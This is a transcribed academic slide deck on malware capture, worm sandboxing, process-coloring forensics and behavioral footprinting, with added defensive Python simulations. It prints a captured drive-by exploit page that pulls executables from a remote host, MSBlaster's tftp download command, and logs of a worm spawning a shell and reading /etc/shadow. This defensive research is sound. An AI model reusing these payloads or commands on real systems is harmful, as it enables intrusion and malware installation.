Post on 21-Dec-2015
Page 1
Enabling Internet Malware Investigation and Defense Using Virtualization
Dongyan Xu
Department of Computer Science and Center for Education and Research in Information Assurance and Security (CERIAS), Purdue University
Page 2
Collaborators
- Florian Buchholz (James Madison U.)
- Xuxian Jiang (George Mason U.)
- Junghwan Rhee (Purdue U.)
- Ryan Riley (Purdue U.)
- Eugene H. Spafford (Purdue U.)
- AAron Walters (Fortify Research)
- Helen Wang (Microsoft Research)
- Yi-Min Wang (Microsoft Research)
Page 3
Motivation: Rampant Malware Outbreaks
(Chart of outbreaks labelled Blaster, Nimda and CodeRed. Source: Symantec Internet Security Threat Report.)
Internet malware remains a top threat. Malware: virus, worm, spyware, keylogger, bot, ...
Page 4
Motivation: Stealthy Malware
- Recruiting vulnerable nodes (e.g. to create a botnet): zero-day exploits without software patches; low-and-slow propagation
- New attack strategies: exploiting vulnerable client-side software, such as IE; propagating malware with RFID tags
- Providing "value-added" service (or rather, harm): DDoS, spamming, identity theft, ...; selling/renting botnets for profit
Page 5
Reality & Challenges
Lack of an investigation platform that enables:
- Early detection and capture of malware incidents
- Replay and observation of malware behavior
At Internet scale this is hard to build, given the increased spreading speed, sophistication, and malice:
- Slammer worm infects 75,000 hosts in 10 minutes (Moore et al., 2003)
- Stealthy malware, zero-day exploits, mutations, ...
Page 6
Our Integrated Malware Research Framework
(Diagram linking the investigation, detection and defense components.)
- Front-End: Collapsar Honeyfarm, the Malware Trap that captures external infection [Collapsar: Security'04, NDSS'06, JPDC'06]
- Back-End: vGround, the Malware Playground [vGround: RAID'05]
- Contamination Tracking of internal contamination [Proc. Coloring: ICDCS'06]
- Behavioral Footprinting [WORM'06]
- System Randomization
Page 7
Part I: Malware Capture
(Framework diagram as on page 6, with the Front-End, Collapsar, highlighted.)
Page 8
Existing Approach: Honeypot
(Diagram: honeypots deployed separately in Domain A, Domain B and Domain C, each connected to the Internet.)
Two weaknesses:
- Manageability vs. detection coverage
- Security risks: on-site attack occurrences
Page 9
Our Approach: Collapsar
(Diagram: a Redirector in each of Domain A, B and C forwards traffic to the Collapsar Center, which hosts the Front-End, the VM-based honeypots of the Collapsar Honeyfarm, a Management Station and a Correlation Engine.)
- Benefit 1: Centralized management of honeypots with distributed (virtual) presence
- Benefit 2: Off-site attack occurrences
- Benefit 3: New possibilities for real-time attack correlation and log mining
Page 10
Collapsar as a Server-side Honeyfarm
(Same Redirector / Collapsar Center diagram as on page 9.)
Passive honeypots with vulnerable server-side software:
- Web servers (e.g., Apache, IIS, ...)
- Database servers (e.g., Oracle, MySQL, ...)
Examples: Blaster (2003), Sasser (2004), Zotob (2005)
Page 11
Collapsar as a Client-side Honeyfarm
(Same diagram as on page 9, with the honeypots visiting a Malicious Web Server.)
Active honeypots with vulnerable client-side software:
- Web browsers (e.g., IE, Firefox, ...)
- Email clients (e.g., Outlook, ...)
[HoneyMonkey, NDSS'06]
PlanetLab (310 sites): 288 malicious sites / 2 zero-day exploits
Page 12
A Real Incident: Exploitation of Client-side Vulnerability
Upon clicking a malicious URL (http://xxx.9x.xx8.8x/users/xxxx/xxx/laxx/z.html), the result: 22 unwanted programs are installed without the user's consent!
Vulnerabilities exploited: MS04-013, MS03-011, MS05-002
The captured page:
```html
<html><head><title></title></head><body>
<style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>
try{document.write('<object data=`ms-its:mhtml:file://C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){} </script>
</body></html>
```
Page 13
Related Work
Systems compared: Honeyd [Security'04], iSink [RAID'04], IMS [NDSS'05]; honeyclient [RECON'05]; Domino [NDSS'04], NetBait ['03]; Potemkin [SOSP'05], GQ ['06]; Collapsar [Security'04, JPDC'06].
Comparison dimensions: high-interaction with real services; off-site attack occurrences; aggregation of scattered unused address space; passive & active honeypots.
Honeypot type: Honeyd, iSink, IMS, Domino, NetBait, Potemkin and GQ are passive; honeyclient is active; Collapsar supports both passive and active honeypots.
Page 14
Part II: Malware Playground
(Framework diagram as on page 6, with the Back-End, vGround, highlighted.)
Page 15
Challenges
- Fidelity: real worms
- Confinement: destructive worms
- Scalability: epidemic propagation pattern
- Experimental efficiency
Page 16
A Virtualization-Based Worm Playground
(Diagram: a worm playground built on virtualization, hosted on paris.cs.purdue.edu.)
- High fidelity: VM, full-system virtualization
- Strict confinement: VN, link-layer network virtualization
- Easy deployment: locally deployable
- Efficient experiments: image generation time 60 seconds; boot-strap time 90 seconds; tear-down time 10 seconds
The need for such a playground is raised in "Fighting Computer Virus Attacks", Peter Szor, USENIX Security Symp., 2004.
Page 17
Challenge in Achieving Scalability
Three main techniques:
- VM footprint minimization (Redhat 9.0: 1G -> 32M)
- Delta virtualization (a.k.a. copy-on-write)
- Worm-driven vGround runtime expansion
Result: 2000+ virtual nodes in 10 physical machines
Page 18
Worm Expert's Comments on vGround
(The slide shows the comments as an image; no text was captured.)
Page 19
vGround Impact & Applications
- Evaluation: correctness of documented worm/malware analysis; effectiveness of defense mechanisms
- Education potentials
Page 20
Part III: Malware Defense
(Framework diagram as on page 6, with Contamination Tracking of internal contamination highlighted.)
Page 21
Malware Forensics
For each malware incident, it is desirable to find out:
- Break-in point: how did the malware break into the system?
- Contaminations: what did the malware do after the break-in?
Page 22
Current Approach
(Diagram of an incident: httpd spawns /bin/sh, which runs netcat (reading /etc/shadow and other confidential info) and wget (fetching a root kit) and modifies local files; an alert is raised on the root kit.)
- Question 1: How did the malware break into the system?
- Question 2: What did the malware do after break-in?
Page 23
Current Approach, step 1: Online Log Collection
(Same incident diagram as on page 22.) The log records:
- "httpd" READS an incoming request
- "httpd" CREATES a new process "/bin/sh"
- "/bin/sh" CREATES a new process "netcat"
- "netcat" READS "/etc/shadow" file
- "/bin/sh" MODIFIES local files
- "/bin/sh" CREATES a new process "wget"
- "wget" CREATES local file(s) - "Root kit"
Page 24
Current Approach, step 2: Offline Backward Tracking [King+, SOSP'03]
Starting from the alert (the root kit files) and tracking backward through the log:
- "wget" CREATES local file(s) - "Root kit"
- "/bin/sh" CREATES a new process "wget"
- "httpd" CREATES a new process "/bin/sh" <- Break-in point!
Page 25
Current Approach, step 3: Offline Forward Tracking
Starting from the break-in point and tracking forward through the log:
- "httpd" CREATES a new process "/bin/sh" <- Break-in point!
- "/bin/sh" CREATES a new process "netcat"
- "netcat" READS "/etc/shadow" file
- "/bin/sh" MODIFIES local files
- "/bin/sh" CREATES a new process "wget"
- "wget" CREATES local file(s) - "Root kit"
Page 26
Weaknesses of Current Approach
- Backward tracking (finds the break-in point). Inputs: detection point and the entire log
- Forward tracking (finds the contaminations). Inputs: break-in point and the entire log
Timeline: intrusion occurred ... long detection period ... intrusion detected. In both cases: analyze the entire log!
High-volume log data: 1.2 gigabytes per day under server workload
Page 27
Our Approach - Process Coloring
Main idea: information flow-preserving logging.
(Diagram: Apache, Sendmail, DNS and MySQL services all writing to one log, with a suspicious log entry highlighted.)
Page 28
Our Approach - Process Coloring
1: Initial coloring. The services started by rc/init (s30sendmail, s45named, s55sshd, s80httpd) each receive a distinct color.
2: Coloring diffusion. The color follows the information flow through the incident: httpd -> /bin/sh -> netcat (/etc/shadow, confidential info), wget (root kit), modified local files; each log entry carries the color of the process that produced it.
- Benefit 1: Immediate identification of break-in point
- Benefit 2: Color-based log partition for contamination analysis
Page 29
Color Diffusion Model
OS-level information flow (Buchholz 2005). s1, s2 are subjects (processes), o1 is an object (file or similar).

| Operation | Diffusion | Syscalls |
|---|---|---|
| CREATE | create <s1, o1>: color(o1) = color(s1); create <s1, s2>: color(s2) = color(s1) | create, mkdir, link; fork, vfork, clone |
| READ | read <s1, o1>: color(s1) = color(s1) ∪ color(o1); read <s1, s2>: color(s1) = color(s1) ∪ color(s2) | read, readv, recv; ptrace |
| WRITE | write <s1, o1>: color(o1) = color(s1) ∪ color(o1); write <s1, s2>: color(s2) = color(s1) ∪ color(s2) | write, writev, send; ptrace, wait, signal |
| DESTROY | destroy <s1, o1>, destroy <s1, s2>: no diffusion | unlink, rmdir, close; exit, kill |
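As an added example (not code from the talk), the following Python simulates both the current approach of pages 23 to 26 (backward and forward tracking over the whole log) and the diffusion rules of the table above on a constructed log of the httpd/sh/netcat/wget incident; the service-to-color assignment and the extra benign entries from other services are assumptions.

```python
"""Process Coloring versus whole-log backward/forward tracking.

Added example, not code from the talk. The event log is constructed from
the httpd -> /bin/sh -> netcat/wget scenario on the slides, with a few
benign entries from other services mixed in. Colors are modelled as sets
so the READ/WRITE rules (color(s1) = color(s1) U color(o1)) are literal."""
from collections import defaultdict

# 1: Initial coloring. Each network service started by init gets its own
# color (constructed assignment; the slides only name the services).
INITIAL = {"httpd": "RED", "sendmail": "BLUE", "named": "GREEN", "sshd": "YELLOW"}

# Constructed log of (operation, subject, target); targets are files or
# processes. The last entry is the detection point (the "Root kit" alert).
LOG = [
    ("READ",   "sendmail", "/proc/loadavg"),
    ("READ",   "httpd",    "incoming request"),   # the exploit request
    ("CREATE", "httpd",    "/bin/sh"),
    ("CREATE", "/bin/sh",  "netcat"),
    ("READ",   "netcat",   "/etc/shadow"),
    ("WRITE",  "/bin/sh",  "local files"),
    ("READ",   "named",    "/etc/named.conf"),
    ("CREATE", "/bin/sh",  "wget"),
    ("WRITE",  "sshd",     "/var/log/wtmp"),
    ("CREATE", "wget",     "Root kit"),           # detection point
]
DETECTION = len(LOG) - 1


def backward_track(log, detection):
    """Current approach, step 2: walk the whole log backwards from the
    detection point and collect the entries it causally depends on."""
    tainted = {log[detection][1]}
    chain = [detection]
    for i in range(detection - 1, -1, -1):
        op, s1, o1 = log[i]
        if op in ("CREATE", "WRITE") and o1 in tainted:
            tainted.add(s1)          # whoever created/wrote it is upstream
            chain.append(i)
        elif op == "READ" and s1 in tainted:
            chain.append(i)          # input consumed by an upstream process
    return chain[::-1]               # chain[0] is the break-in point


def forward_track(log, start):
    """Current approach, step 3: from the break-in point forwards, collect
    every entry the intruder's processes touched (the contaminations)."""
    tainted = {log[start][1]}
    hits = []
    for i in range(start, len(log)):
        op, s1, o1 = log[i]
        if s1 in tainted:
            hits.append(i)
            if op in ("CREATE", "WRITE"):
                tainted.add(o1)
        elif op == "READ" and o1 in tainted:
            tainted.add(s1)          # reading a tainted file taints the reader
            hits.append(i)
    return hits


def diffuse(log, initial):
    """2: Coloring diffusion. Tag each entry with its subject's color set
    after applying the CREATE/READ/WRITE rules of the diffusion table."""
    color = defaultdict(set)
    for proc, c in initial.items():
        color[proc].add(c)
    colored = []
    for op, s1, o1 in log:
        if op == "CREATE":           # color(o1) = color(s1)
            color[o1] = set(color[s1])
        elif op == "READ":           # color(s1) = color(s1) U color(o1)
            color[s1] |= color[o1]
        elif op == "WRITE":          # color(o1) = color(s1) U color(o1)
            color[o1] |= color[s1]
        colored.append((frozenset(color[s1]), op, s1, o1))
    return colored


def break_in_services(colored_entry, initial):
    """Benefit 1: the alert entry's color names the service that was broken
    into; no backward scan of the log is needed."""
    by_color = {c: svc for svc, c in initial.items()}
    return sorted(by_color[c] for c in colored_entry[0])


def partition(colored, c):
    """Benefit 2: only the entries carrying color c need inspection."""
    return [e for e in colored if c in e[0]]


if __name__ == "__main__":
    chain = backward_track(LOG, DETECTION)
    print("break-in point:", LOG[chain[0]], "after scanning", DETECTION + 1, "entries")
    print("contaminations:", [LOG[i] for i in forward_track(LOG, chain[0])])
    colored = diffuse(LOG, INITIAL)
    print("alert entry:", colored[DETECTION])
    print("broken-in service:", break_in_services(colored[DETECTION], INITIAL))
    print(f"entries to inspect: {len(partition(colored, 'RED'))} of {len(LOG)}")
```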
Page 30
Process Coloring Log – Slapper Worm
```text
...
BLUE: 673["sendmail"]: 5_open("/proc/loadavg", 0, 438) = 5
BLUE: 673["sendmail"]: 192_mmap2(0, 4096, 3, 34, 4294967295, 0) = 1073868800
BLUE: 673["sendmail"]: 3_read(5, "0.26 0.10 0.03 2...", 4096) = 25
BLUE: 673["sendmail"]: 6_close(5) = 0
BLUE: 673["sendmail"]: 91_munmap(1073868800, 4096) = 0
...
RED: 2568["httpd"]: 102_accept(16, sockaddr{2, cbbdff3a}, cbbdff38) = 5
RED: 2568["httpd"]: 3_read(5, "\1281\1\0\2\0\24...", 11) = 11
RED: 2568["httpd"]: 3_read(5, "\7\0À\5\0\128\3\...", 40) = 40
RED: 2568["httpd"]: 4_write(5, "\132@\4\0\1\0\2\...", 1090) = 1090
…
RED: 2568["httpd"]: 4_write(5, "\128\19Ê\136\18\...", 21) = 21
RED: 2568["httpd"]: 63_dup2(5, 2) = 2
RED: 2568["httpd"]: 63_dup2(5, 1) = 1
RED: 2568["httpd"]: 63_dup2(5, 0) = 0
RED: 2568["httpd"]: 11_execve("/bin//sh", bffff4e8, 00000000)
RED: 2568["sh"]: 5_open("/etc/ld.so.prelo...", 0, 8) = −2
RED: 2568["sh"]: 5_open("/etc/ld.so.cache", 0, 0) = 6
```
Page 31
Evaluation

| | Lion | Slapper | SARS |
|---|---|---|---|
| Time period being analyzed | 24 hours | 24 hours | 24 hours |
| # worm-related entries | 66,504 | 195,884 | 19,494 |
| Exploited service | BIND (CVE-2001-0010) | Apache (CAN-2002-0656) | Samba (CAN-2003-0085) |
| % of log inspected | 48.7% | 65.9% | 12.1% |

- Benefit for backward tracking: immediate identification of break-in point
- Benefit for forward tracking: reduced log volume for contamination analysis
Page 32
Challenge in Log Collection
Question: Can we trust a compromised system to collect log information?
(Diagram: logging by system call interception inside the OS kernel, beneath User Process 1 and User Process 2.)
Page 33
(Diagram: the Guest OS Kernel (UML) runs as a Virtual Machine over the Host OS Kernel + VMM; logging is performed via ptrace at the host level rather than inside the guest kernel.)
- Interception on the system virtualization path
- Virtual Machine Introspection [Garfinkel+, NDSS'03]
- More tamper-resistant
Page 34
On-going Work
Multi-dimensional worm profiling & identification:
- Content fingerprinting: unique recurring content
- Behavioral footprinting: unique recurring behavior
- Infection cycle: probing, exploitation, replication, payload
Page 35
MSBlaster/Windows Worm
(Diagram: Blaster host 192.168.0.1 attacking the Target/RPC host 192.168.10.11.)
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell "cmd.exe" and binds it to port 4444/TCP
5. Creates "TFTP Server" on port 69/UDP
6. Sends "TFTP" command to shell: >tftp -I 192.168.0.1 GET msblast.exe
7. Runs TFTP command; "teleports" msblast.exe file
8. Sends "START msblast.exe" command
9. Runs worm on target!
10. Closes connection
11. Shell closes
Content signature (Snort rule):
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Page 36
Behavioral Footprints

| Worm Name | Infection Vector | Behavioral Footprint |
|---|---|---|
| MSBlaster | RPC-DCOM | S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2 |

Footprint symbols (infecter:* denotes an ephemeral source port):
- S1: TCP, infecter:* -> victim:135, SYN
- SA1: TCP, victim:135 -> infecter:*, SYN ACK
- A1: TCP, infecter:* -> victim:135, ACK
- R1: TCP, infecter:* -> victim:135, RST
- S2: TCP, infecter:* -> victim:4444, SYN
- SA2: TCP, victim:4444 -> infecter:*, SYN ACK
- A2: TCP, infecter:* -> victim:4444, ACK
- U1: UDP, victim:* -> infecter:69, and UDP, infecter:69 -> victim:*
- R2: TCP, infecter:* -> victim:4444, RST
The footprint is labelled by infection-cycle phase: Exploitation, Replication.
For comparison, the content signature (Snort rule):
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
Page 37
Behavioral Footprints

| Worm Name | Infection Vector |
|---|---|
| MSBlaster | RPC-DCOM |
| Welchia | RPC-DCOM |
| Sasser | LSASS |
| Ramen | LPRng, WU-FTPD, NFS-UTILS |
| Lion | BIND |
| Slapper | APACHE |
| SARS | SAMBA |

(The Behavioral Footprints column of this table did not survive extraction; MSBlaster's footprint is given on page 36.)
Page 38
Summary
(Diagram: Redirectors in Domain A, B and C feed the Collapsar Front-End, which in turn feeds vGround I and vGround II.)
Design and evaluation of advanced malware defense mechanisms using our unique integrated malware research platform.
Page 40
Backup Slides
Page 41
Another Example Incident: Windows XP Server-side Honeypot / VMware
Vulnerability: RPC DCOM vulnerability (Microsoft Security Bulletin MS03-026)
Time-line:
- Deployed: 22:10:00pm, 11/26/03
- MSBlast: 00:36:47am, 11/27/03
- Enbiei: 01:48:57am, 11/27/03
- Nachi: 07:03:55am, 11/27/03
http://www.cs.purdue.edu/homes/jiangx/collapsar
Page 42
vGround: Network Virtualization
(Diagram: Virtual Machine 1 and Virtual Machine 2, each running a Guest OS, on a Host OS / VMM, connected through Virtual Switch 1; the link between the two Host OS / VMM boxes is labelled IP-IP.)
- Option 1: Network-layer virtualization (e.g., X-Bone)
- Option 2: Link-layer virtualization (e.g., VIOLIN)
Page 43
Logging Integrity -- Existing Approach
(Diagram: a user-space fork("/bin/sh") enters kernel space through the System Call Dispatcher, which indexes the System Call Table; a logging hook sits in front of each handler and the result is returned to user space.)

| # | Syscall | Handler | Logging hook |
|---|---|---|---|
| 0 | restart | sys_restart_syscall | log_restart_syscall |
| 1 | exit | sys_exit | log_exit |
| 2 | fork | sys_fork | log_fork |
| 3 | read | sys_read | log_read |
| 4 | write | sys_write | log_write |
| 283 | ni_syscall | sys_ni_syscall | log_ni_syscall |

System call interception: Unreliable!
Page 44
Virtual Machine Introspection [Garfinkel+, NDSS'03]
Interception at the system virtualization path:
- Type 1 VMM: the Virtual Machine Monitor (VMM) runs directly on the Hardware and hosts Guest OS 1 and Guest OS 2
- Type 2 VMM: the VMM runs on a Host OS on the Hardware and hosts Guest OS 1 and Guest OS 2
In both cases logging is placed on the virtualization path beneath Guest OS 2: Tamper-Resistant!
Page 45
Process Coloring -- Slapper Worm
(Diagram of the logged information flow:)
- inet_sock(80) --accept--> 2568: httpd
- 2568: httpd --recv, dup2, read--> fd 5
- 2568: httpd --execve--> 2568(execve): /bin//sh
- 2568(execve): /bin//sh --execve--> 2568(execve): /bin/bash -i
- 2568(execve): /bin/bash -i --fork, execve--> 2586: /bin/rm -rf /tmp/.bugtraq.c
- 2568(execve): /bin/bash -i --fork, execve--> 2587: /bin/cat /tmp/.uubugtraq /tmp/.bugtraq.c
- File operations on /tmp/.uubugtraq and /tmp/.bugtraq.c: open, dup2, write; unlink
Page 46
Process Coloring Log – Slapper Worm
(Same diagram as on page 45.)
Page 47
Counter-attacks against Proc. Coloring
- Coloring mixing attack. Good news: an important anomaly itself. Bad news: need for advanced filtering policies
- Low-level attack: kernel integrity (e.g. CoPilot, Livewire, Pioneer); shadow structure via VMM
- Diffusion-cutting attack: covert channels
Page 48
Footprinting Representation: MSBlaster Worm
Observed packet sequence (infecter ports 4581 and 4599, victim port 1552):
- S1: TCP, infecter:4581 -> victim:135, SYN (1st TCP handshake, 135/TCP)
- SA1: TCP, victim:135 -> infecter:4581, SYN ACK
- A1: TCP, infecter:4581 -> victim:135, ACK
- R1: TCP, infecter:4581 -> victim:135, RST
- S2: TCP, infecter:4599 -> victim:4444, SYN (2nd TCP handshake, 4444/TCP shell)
- SA2: TCP, victim:4444 -> infecter:4599, SYN ACK
- A2: TCP, infecter:4599 -> victim:4444, ACK
- Sending "tftp ..." over the shell
- U1: UDP, victim:1552 -> infecter:69 (69/UDP tftp)
- U1: UDP, infecter:69 -> victim:1552
- R2: TCP, infecter:4599 -> victim:4444, RST
Generalized footprint with the ephemeral ports replaced by *: S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2 (symbol definitions as on page 36).
For comparison, the content signature (Snort rule):
alert ip $EXTERNAL_NET any -> $HOME_NET 135 (msg:"RPC DCOM exploit/ Blaster Worm Attack"; content:"| 77 65 6b d6 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C 34 72 98 0B CF 2E 39 0B |"; …)
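As an added example (not the project's code) for the footprint representation above and on page 36, the following Python abstracts a constructed packet trace into the footprint symbols and matches MSBlaster's footprint S1 SA1 A1 R1 S2 SA2 A2 U1 U1 R2 as an ordered subsequence; the addresses are the slide's 192.168.0.1 and 192.168.10.11, while the third host 192.168.10.20 and the interleaved web-request packet are constructed noise.

```python
"""Behavioral footprinting of the MSBlaster infection cycle.

Added example, not the project's code. A constructed packet trace is
abstracted to the footprint symbols from the slides and matched, in
order, against MSBlaster's footprint; unrelated packets are ignored."""
from collections import namedtuple

Pkt = namedtuple("Pkt", "proto src sport dst dport flags")

# Exploit handshake on 135/TCP (S1 SA1 A1) closed with RST (R1), shell
# handshake on 4444/TCP (S2 SA2 A2), tftp on 69/UDP in both directions
# (U1 U1), shell connection closed (R2).
MSBLASTER = ["S1", "SA1", "A1", "R1", "S2", "SA2", "A2", "U1", "U1", "R2"]
TCP_ROLE = {135: "1", 4444: "2"}   # which handshake a TCP service port belongs to


def symbolize(pkt, infecter, victim):
    """Map one packet to a footprint symbol for the (infecter, victim) pair,
    or None if it is not part of the footprint. Infecter-side source ports
    are ephemeral, so only the service port is matched."""
    if pkt.proto == "TCP":
        if (pkt.src, pkt.dst) == (infecter, victim) and pkt.dport in TCP_ROLE:
            if pkt.flags in ("S", "A", "R"):
                return pkt.flags + TCP_ROLE[pkt.dport]
        elif (pkt.src, pkt.dst) == (victim, infecter) and pkt.sport in TCP_ROLE:
            if pkt.flags == "SA":
                return "SA" + TCP_ROLE[pkt.sport]
    elif pkt.proto == "UDP":
        request = (pkt.src, pkt.dst, pkt.dport) == (victim, infecter, 69)
        reply = (pkt.src, pkt.sport, pkt.dst) == (infecter, 69, victim)
        if request or reply:
            return "U1"
    return None


def is_subsequence(footprint, symbols):
    """True if every footprint symbol occurs in symbols in the same order."""
    it = iter(symbols)
    return all(any(s == f for s in it) for f in footprint)


def candidate_pairs(trace):
    """Every (src, dst) that opened a connection to 135/TCP is a potential
    (infecter, victim) pair worth checking."""
    return sorted({(p.src, p.dst) for p in trace
                   if p.proto == "TCP" and p.dport == 135 and p.flags == "S"})


def detect(trace, footprint=MSBLASTER):
    """Return the (infecter, victim) pairs whose traffic matches the footprint."""
    found = []
    for infecter, victim in candidate_pairs(trace):
        symbols = [s for s in (symbolize(p, infecter, victim) for p in trace) if s]
        if is_subsequence(footprint, symbols):
            found.append((infecter, victim))
    return found


INF, VIC, OTHER = "192.168.0.1", "192.168.10.11", "192.168.10.20"
# Constructed trace: the infection cycle with unrelated traffic interleaved.
INFECTION_TRACE = [
    Pkt("TCP", INF, 4581, VIC, 135, "S"),
    Pkt("TCP", VIC, 135, INF, 4581, "SA"),
    Pkt("TCP", INF, 4581, VIC, 135, "A"),
    Pkt("TCP", OTHER, 40001, VIC, 80, "S"),     # noise: an ordinary web request
    Pkt("TCP", INF, 4581, VIC, 135, "R"),
    Pkt("TCP", INF, 4599, VIC, 4444, "S"),
    Pkt("TCP", VIC, 4444, INF, 4599, "SA"),
    Pkt("TCP", INF, 4599, VIC, 4444, "A"),
    Pkt("UDP", VIC, 1552, INF, 69, ""),         # tftp GET from the victim
    Pkt("UDP", INF, 69, VIC, 1552, ""),         # tftp data from the infecter
    Pkt("TCP", INF, 4599, VIC, 4444, "R"),
]
# Constructed trace: a bare 135/TCP connection that never reaches the shell stage.
SCAN_TRACE = INFECTION_TRACE[:3] + [Pkt("TCP", INF, 4581, VIC, 135, "R")]

if __name__ == "__main__":
    print("infection trace:", detect(INFECTION_TRACE))
    print("scan trace:", detect(SCAN_TRACE))
```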